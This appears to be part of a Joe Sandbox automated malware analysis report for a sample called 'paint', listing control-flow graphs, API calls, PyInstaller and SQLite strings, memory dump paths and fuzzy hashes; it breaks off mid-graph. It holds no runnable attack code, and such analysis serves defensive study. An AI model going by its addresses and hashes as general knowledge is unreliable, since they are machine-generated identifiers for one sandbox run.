                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 31276548-0
                                                                                                                                                                                                                                                                • Opcode ID: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
                                                                                                                                                                                                                                                                • Instruction ID: eeba87f3e2091aea78d9c0486b70b38b1cfe7f06a19fd2cae5b2d4a84bc6800a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CA1C4A2F0BB4781EF588B45B874AB4A2A4FF46B48F640535C92E467F8DF7CE4959200

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 267 7ff6f0bd1950-7ff6f0bd198b call 7ff6f0bd45b0 270 7ff6f0bd1c4e-7ff6f0bd1c72 call 7ff6f0bdc5c0 267->270 271 7ff6f0bd1991-7ff6f0bd19d1 call 7ff6f0bd7f80 267->271 276 7ff6f0bd1c3b-7ff6f0bd1c3e call 7ff6f0be00bc 271->276 277 7ff6f0bd19d7-7ff6f0bd19e7 call 7ff6f0be0744 271->277 281 7ff6f0bd1c43-7ff6f0bd1c4b 276->281 282 7ff6f0bd1a08-7ff6f0bd1a24 call 7ff6f0be040c 277->282 283 7ff6f0bd19e9-7ff6f0bd1a03 call 7ff6f0be4f78 call 7ff6f0bd2910 277->283 281->270 289 7ff6f0bd1a45-7ff6f0bd1a5a call 7ff6f0be4f98 282->289 290 7ff6f0bd1a26-7ff6f0bd1a40 call 7ff6f0be4f78 call 7ff6f0bd2910 282->290 283->276 297 7ff6f0bd1a7b-7ff6f0bd1afc call 7ff6f0bd1c80 * 2 call 7ff6f0be0744 289->297 298 7ff6f0bd1a5c-7ff6f0bd1a76 call 7ff6f0be4f78 call 7ff6f0bd2910 289->298 290->276 309 7ff6f0bd1b01-7ff6f0bd1b14 call 7ff6f0be4fb4 297->309 298->276 312 7ff6f0bd1b35-7ff6f0bd1b4e call 7ff6f0be040c 309->312 313 7ff6f0bd1b16-7ff6f0bd1b30 call 7ff6f0be4f78 call 7ff6f0bd2910 309->313 318 7ff6f0bd1b6f-7ff6f0bd1b8b call 7ff6f0be0180 312->318 319 7ff6f0bd1b50-7ff6f0bd1b6a call 7ff6f0be4f78 call 7ff6f0bd2910 312->319 313->276 327 7ff6f0bd1b9e-7ff6f0bd1bac 318->327 328 7ff6f0bd1b8d-7ff6f0bd1b99 call 7ff6f0bd2710 318->328 319->276 327->276 331 7ff6f0bd1bb2-7ff6f0bd1bb9 327->331 328->276 332 7ff6f0bd1bc1-7ff6f0bd1bc7 331->332 334 7ff6f0bd1be0-7ff6f0bd1bef 332->334 335 7ff6f0bd1bc9-7ff6f0bd1bd6 332->335 334->334 336 7ff6f0bd1bf1-7ff6f0bd1bfa 334->336 335->336 337 7ff6f0bd1c0f 336->337 338 7ff6f0bd1bfc-7ff6f0bd1bff 336->338 340 7ff6f0bd1c11-7ff6f0bd1c24 337->340 338->337 339 7ff6f0bd1c01-7ff6f0bd1c04 338->339 339->337 341 7ff6f0bd1c06-7ff6f0bd1c09 339->341 342 7ff6f0bd1c2d-7ff6f0bd1c39 340->342 343 7ff6f0bd1c26 340->343 341->337 344 7ff6f0bd1c0b-7ff6f0bd1c0d 341->344 342->276 342->332 343->342 344->340
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD7F80: _fread_nolock.LIBCMT ref: 00007FF6F0BD802A
                                                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF6F0BD1A1B
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6F0BD1B6A), ref: 00007FF6F0BD295E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                • Opcode ID: cd0a3765df11f2bbfda315c56b798e358636bbaa146f7382309ff43e7b9542cf
                                                                                                                                                                                                                                                                • Instruction ID: e528fdf8846a88169fbcff59631d6b632cad717047f6798f0291ed39d8d2b1f2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd0a3765df11f2bbfda315c56b798e358636bbaa146f7382309ff43e7b9542cf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE819171A1D683B5EB20DB24D0406B963A2EF46784F844431E9AFC77C5FE3EE5858740

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                • Opcode ID: d93f19cd1d84b14fa0365c41b42ee9721bcb5a53f9100330deb0bb0610ffab13
                                                                                                                                                                                                                                                                • Instruction ID: 6bba4a8ddf6175e95ce4486ca9e9fecd103b7d935a5f7fea0a559699a4d64032
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d93f19cd1d84b14fa0365c41b42ee9721bcb5a53f9100330deb0bb0610ffab13
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9418F21A09643B5EB10DB61A4005B9A395EF96788FC44932EE2F87BD5FF3EE541C740

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1008 7ffdfb0e4450-7ffdfb0e4514 call 7ffdfb0e4150 1011 7ffdfb0e451a-7ffdfb0e4538 1008->1011 1012 7ffdfb0e48c6-7ffdfb0e48c9 1008->1012 1013 7ffdfb0e453a-7ffdfb0e454d 1011->1013 1014 7ffdfb0e4552-7ffdfb0e4556 1011->1014 1015 7ffdfb0e48cb-7ffdfb0e48d1 1012->1015 1016 7ffdfb0e48d3-7ffdfb0e48d6 call 7ffdfb066c40 1012->1016 1018 7ffdfb0e48ef-7ffdfb0e490e call 7ffdfb192920 1013->1018 1019 7ffdfb0e4566-7ffdfb0e4572 1014->1019 1020 7ffdfb0e4558-7ffdfb0e455f 1014->1020 1015->1016 1021 7ffdfb0e48db-7ffdfb0e48e1 call 7ffdfb0c1310 1015->1021 1016->1021 1025 7ffdfb0e4574-7ffdfb0e4578 1019->1025 1026 7ffdfb0e457e-7ffdfb0e4582 1019->1026 1020->1019 1024 7ffdfb0e4561 call 7ffdfb07ff80 1020->1024 1029 7ffdfb0e48e6-7ffdfb0e48e8 1021->1029 1024->1019 1025->1026 1032 7ffdfb0e45fb-7ffdfb0e4606 1025->1032 1027 7ffdfb0e458a-7ffdfb0e458f call 7ffdfb083820 1026->1027 1028 7ffdfb0e4584-7ffdfb0e4588 1026->1028 1036 7ffdfb0e4594-7ffdfb0e4598 1027->1036 1028->1027 1033 7ffdfb0e45f8 1028->1033 1029->1018 1035 7ffdfb0e4610-7ffdfb0e4627 call 7ffdfb08d6f0 1032->1035 1033->1032 1041 7ffdfb0e4629-7ffdfb0e4631 1035->1041 1036->1033 1038 7ffdfb0e459a-7ffdfb0e45a7 call 7ffdfb1228c0 1036->1038 1045 7ffdfb0e45a9 1038->1045 1046 7ffdfb0e45de-7ffdfb0e45e5 1038->1046 1043 7ffdfb0e4633-7ffdfb0e463c 1041->1043 1044 7ffdfb0e463e 1041->1044 1047 7ffdfb0e4641-7ffdfb0e464f 1043->1047 1044->1047 1048 7ffdfb0e45b0-7ffdfb0e45b9 1045->1048 1051 7ffdfb0e45e7-7ffdfb0e45ea call 7ffdfb066400 1046->1051 1052 7ffdfb0e45ef-7ffdfb0e45f3 1046->1052 1049 7ffdfb0e4705 1047->1049 1050 7ffdfb0e4655-7ffdfb0e4658 1047->1050 1048->1048 1054 7ffdfb0e45bb-7ffdfb0e45cd call 7ffdfb066880 1048->1054 1057 7ffdfb0e470a-7ffdfb0e471d 1049->1057 1055 7ffdfb0e465a-7ffdfb0e465f 1050->1055 1056 7ffdfb0e4695-7ffdfb0e469b 1050->1056 1051->1052 1053 7ffdfb0e48a9-7ffdfb0e48b1 1052->1053 1060 7ffdfb0e48b3-7ffdfb0e48b7 1053->1060 1061 7ffdfb0e48be-7ffdfb0e48c4 1053->1061 1054->1046 1083 7ffdfb0e45cf-7ffdfb0e45d9 00007FFE1A463010 1054->1083 1055->1056 1063 7ffdfb0e4661-7ffdfb0e4676 1055->1063 1056->1049 1059 7ffdfb0e469d-7ffdfb0e46b0 call 7ffdfb066880 1056->1059 1064 7ffdfb0e4753-7ffdfb0e4766 1057->1064 1065 7ffdfb0e471f-7ffdfb0e4724 1057->1065 1089 7ffdfb0e46e6-7ffdfb0e46ed 1059->1089 1090 7ffdfb0e46b2-7ffdfb0e46e3 1059->1090 1060->1061 1069 7ffdfb0e48b9 call 7ffdfb07ff50 1060->1069 1061->1012 1061->1029 1071 7ffdfb0e468b-7ffdfb0e4693 call 7ffdfb0ca8b0 1063->1071 1072 7ffdfb0e4678-7ffdfb0e467b 1063->1072 1067 7ffdfb0e476c-7ffdfb0e4774 1064->1067 1068 7ffdfb0e4768 1064->1068 1073 7ffdfb0e4736-7ffdfb0e473d 1065->1073 1074 7ffdfb0e4726-7ffdfb0e472b 1065->1074 1080 7ffdfb0e47bc-7ffdfb0e47be 1067->1080 1081 7ffdfb0e4776-7ffdfb0e4789 call 7ffdfb066880 1067->1081 1068->1067 1069->1061 1071->1057 1072->1071 1084 7ffdfb0e467d-7ffdfb0e467f 1072->1084 1078 7ffdfb0e4740-7ffdfb0e474e call 7ffdfb082ee0 1073->1078 1075 7ffdfb0e4734 1074->1075 1076 7ffdfb0e472d-7ffdfb0e4732 1074->1076 1075->1073 1076->1078 1078->1064 1085 7ffdfb0e47cb-7ffdfb0e4822 call 7ffdfb069180 call 7ffdfb0dcfb0 1080->1085 1086 7ffdfb0e47c0-7ffdfb0e47c4 1080->1086 1102 7ffdfb0e478b-7ffdfb0e479d 1081->1102 1103 7ffdfb0e47a2-7ffdfb0e47a9 1081->1103 1083->1046 1084->1071 1092 7ffdfb0e4681-7ffdfb0e4686 1084->1092 1108 7ffdfb0e4827-7ffdfb0e4839 1085->1108 1086->1085 1094 7ffdfb0e47c6 1086->1094 1096 7ffdfb0e46f7-7ffdfb0e4700 1089->1096 1097 7ffdfb0e46ef-7ffdfb0e46f2 call 7ffdfb066400 1089->1097 1090->1089 1093 7ffdfb0e489a-7ffdfb0e489e 1092->1093 1093->1053 1100 7ffdfb0e48a0-7ffdfb0e48a4 call 7ffdfb084c10 1093->1100 1094->1085 1096->1093 1097->1096 1100->1053 1102->1103 1106 7ffdfb0e47ab-7ffdfb0e47ae call 7ffdfb066400 1103->1106 1107 7ffdfb0e47b3-7ffdfb0e47b7 1103->1107 1106->1107 1107->1093 1110 7ffdfb0e483b-7ffdfb0e4841 call 7ffdfb066400 1108->1110 1111 7ffdfb0e4846-7ffdfb0e4848 1108->1111 1110->1111 1113 7ffdfb0e484a-7ffdfb0e4850 call 7ffdfb0be520 1111->1113 1114 7ffdfb0e4855-7ffdfb0e4859 1111->1114 1113->1114 1116 7ffdfb0e485b-7ffdfb0e4870 call 7ffdfb0c13a0 1114->1116 1117 7ffdfb0e4872-7ffdfb0e4874 1114->1117 1116->1093 1118 7ffdfb0e4876-7ffdfb0e487e 1117->1118 1119 7ffdfb0e4885-7ffdfb0e4895 1117->1119 1118->1093 1122 7ffdfb0e4880-7ffdfb0e4883 1118->1122 1119->1093 1122->1093 1122->1119
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                                                • API String ID: 4225454184-879093740
                                                                                                                                                                                                                                                                • Opcode ID: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
                                                                                                                                                                                                                                                                • Instruction ID: 16958a682c656dc8667ae6e4193b033090426f02f537b68000300b1bf5ccc0b2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EE1AD22F0AA938AFB14CF249560ABD27A5FB46B88F054235DE6C177E9DF38E451D340

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1123 7ff6f0bd1210-7ff6f0bd126d call 7ff6f0bdbdf0 1126 7ff6f0bd126f-7ff6f0bd1296 call 7ff6f0bd2710 1123->1126 1127 7ff6f0bd1297-7ff6f0bd12af call 7ff6f0be4fb4 1123->1127 1132 7ff6f0bd12d4-7ff6f0bd12e4 call 7ff6f0be4fb4 1127->1132 1133 7ff6f0bd12b1-7ff6f0bd12cf call 7ff6f0be4f78 call 7ff6f0bd2910 1127->1133 1139 7ff6f0bd12e6-7ff6f0bd1304 call 7ff6f0be4f78 call 7ff6f0bd2910 1132->1139 1140 7ff6f0bd1309-7ff6f0bd131b 1132->1140 1145 7ff6f0bd1439-7ff6f0bd146d call 7ff6f0bdbad0 call 7ff6f0be4fa0 * 2 1133->1145 1139->1145 1141 7ff6f0bd1320-7ff6f0bd1345 call 7ff6f0be040c 1140->1141 1151 7ff6f0bd1431 1141->1151 1152 7ff6f0bd134b-7ff6f0bd1355 call 7ff6f0be0180 1141->1152 1151->1145 1152->1151 1159 7ff6f0bd135b-7ff6f0bd1367 1152->1159 1161 7ff6f0bd1370-7ff6f0bd1398 call 7ff6f0bda230 1159->1161 1164 7ff6f0bd139a-7ff6f0bd139d 1161->1164 1165 7ff6f0bd1416-7ff6f0bd142c call 7ff6f0bd2710 1161->1165 1166 7ff6f0bd139f-7ff6f0bd13a9 1164->1166 1167 7ff6f0bd1411 1164->1167 1165->1151 1169 7ff6f0bd13d4-7ff6f0bd13d7 1166->1169 1170 7ff6f0bd13ab-7ff6f0bd13b9 call 7ff6f0be0b4c 1166->1170 1167->1165 1171 7ff6f0bd13ea-7ff6f0bd13ef 1169->1171 1172 7ff6f0bd13d9-7ff6f0bd13e7 call 7ff6f0bf9ea0 1169->1172 1176 7ff6f0bd13be-7ff6f0bd13c1 1170->1176 1171->1161 1175 7ff6f0bd13f5-7ff6f0bd13f8 1171->1175 1172->1171 1180 7ff6f0bd13fa-7ff6f0bd13fd 1175->1180 1181 7ff6f0bd140c-7ff6f0bd140f 1175->1181 1177 7ff6f0bd13c3-7ff6f0bd13cd call 7ff6f0be0180 1176->1177 1178 7ff6f0bd13cf-7ff6f0bd13d2 1176->1178 1177->1171 1177->1178 1178->1165 1180->1165 1183 7ff6f0bd13ff-7ff6f0bd1407 1180->1183 1181->1151 1183->1141
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                • Opcode ID: fe104055da117a3a3034f39fc0baffbe32c7d20989838b959021b68ce5af3fc8
                                                                                                                                                                                                                                                                • Instruction ID: 6dd0c5d2f4590058812d6be86454b319aa5443a4d6a3686f20d72fa56823c257
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe104055da117a3a3034f39fc0baffbe32c7d20989838b959021b68ce5af3fc8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A251C322A09683B1E760AB51A4003BAA292BF86794FC44535ED6FC77C5FF3EE545CB00

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF6F0BD3804), ref: 00007FF6F0BD36E1
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD3804), ref: 00007FF6F0BD36EB
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2C9E
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2D63
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD2C50: MessageBoxW.USER32 ref: 00007FF6F0BD2D99
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                                • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                                • Instruction ID: 48a944b1a3723ab8dc99759e717684d722368117d21705db7aea60a2791280b3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F121A091B09A42A0FB209B20E9143B6A256BF4A785FC04132D67FC37D6FE2EE505C304

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1425 7ff6f0bebacc-7ff6f0bebaf2 1426 7ff6f0bebaf4-7ff6f0bebb08 call 7ff6f0be4f58 call 7ff6f0be4f78 1425->1426 1427 7ff6f0bebb0d-7ff6f0bebb11 1425->1427 1441 7ff6f0bebefe 1426->1441 1428 7ff6f0bebee7-7ff6f0bebef3 call 7ff6f0be4f58 call 7ff6f0be4f78 1427->1428 1429 7ff6f0bebb17-7ff6f0bebb1e 1427->1429 1448 7ff6f0bebef9 call 7ff6f0bea950 1428->1448 1429->1428 1431 7ff6f0bebb24-7ff6f0bebb52 1429->1431 1431->1428 1434 7ff6f0bebb58-7ff6f0bebb5f 1431->1434 1438 7ff6f0bebb61-7ff6f0bebb73 call 7ff6f0be4f58 call 7ff6f0be4f78 1434->1438 1439 7ff6f0bebb78-7ff6f0bebb7b 1434->1439 1438->1448 1444 7ff6f0bebee3-7ff6f0bebee5 1439->1444 1445 7ff6f0bebb81-7ff6f0bebb87 1439->1445 1446 7ff6f0bebf01-7ff6f0bebf18 1441->1446 1444->1446 1445->1444 1449 7ff6f0bebb8d-7ff6f0bebb90 1445->1449 1448->1441 1449->1438 1452 7ff6f0bebb92-7ff6f0bebbb7 1449->1452 1454 7ff6f0bebbea-7ff6f0bebbf1 1452->1454 1455 7ff6f0bebbb9-7ff6f0bebbbb 1452->1455 1456 7ff6f0bebbf3-7ff6f0bebc1b call 7ff6f0bed66c call 7ff6f0bea9b8 * 2 1454->1456 1457 7ff6f0bebbc6-7ff6f0bebbdd call 7ff6f0be4f58 call 7ff6f0be4f78 call 7ff6f0bea950 1454->1457 1458 7ff6f0bebbe2-7ff6f0bebbe8 1455->1458 1459 7ff6f0bebbbd-7ff6f0bebbc4 1455->1459 1485 7ff6f0bebc1d-7ff6f0bebc33 call 7ff6f0be4f78 call 7ff6f0be4f58 1456->1485 1486 7ff6f0bebc38-7ff6f0bebc63 call 7ff6f0bec2f4 1456->1486 1489 7ff6f0bebd70 1457->1489 1461 7ff6f0bebc68-7ff6f0bebc7f 1458->1461 1459->1457 1459->1458 1464 7ff6f0bebc81-7ff6f0bebc89 1461->1464 1465 7ff6f0bebcfa-7ff6f0bebd04 call 7ff6f0bf398c 1461->1465 1464->1465 1469 7ff6f0bebc8b-7ff6f0bebc8d 1464->1469 1476 7ff6f0bebd8e 1465->1476 1477 7ff6f0bebd0a-7ff6f0bebd1f 1465->1477 1469->1465 1473 7ff6f0bebc8f-7ff6f0bebca5 1469->1473 1473->1465 1478 7ff6f0bebca7-7ff6f0bebcb3 1473->1478 1480 7ff6f0bebd93-7ff6f0bebdb3 ReadFile 1476->1480 1477->1476 1482 7ff6f0bebd21-7ff6f0bebd33 GetConsoleMode 1477->1482 1478->1465 1483 7ff6f0bebcb5-7ff6f0bebcb7 1478->1483 1487 7ff6f0bebead-7ff6f0bebeb6 GetLastError 1480->1487 1488 7ff6f0bebdb9-7ff6f0bebdc1 1480->1488 1482->1476 1490 7ff6f0bebd35-7ff6f0bebd3d 1482->1490 1483->1465 1491 7ff6f0bebcb9-7ff6f0bebcd1 1483->1491 1485->1489 1486->1461 1496 7ff6f0bebed3-7ff6f0bebed6 1487->1496 1497 7ff6f0bebeb8-7ff6f0bebece call 7ff6f0be4f78 call 7ff6f0be4f58 1487->1497 1488->1487 1493 7ff6f0bebdc7 1488->1493 1498 7ff6f0bebd73-7ff6f0bebd7d call 7ff6f0bea9b8 1489->1498 1490->1480 1495 7ff6f0bebd3f-7ff6f0bebd61 ReadConsoleW 1490->1495 1491->1465 1499 7ff6f0bebcd3-7ff6f0bebcdf 1491->1499 1504 7ff6f0bebdce-7ff6f0bebde3 1493->1504 1506 7ff6f0bebd82-7ff6f0bebd8c 1495->1506 1507 7ff6f0bebd63 GetLastError 1495->1507 1501 7ff6f0bebedc-7ff6f0bebede 1496->1501 1502 7ff6f0bebd69-7ff6f0bebd6b call 7ff6f0be4eec 1496->1502 1497->1489 1498->1446 1499->1465 1500 7ff6f0bebce1-7ff6f0bebce3 1499->1500 1500->1465 1510 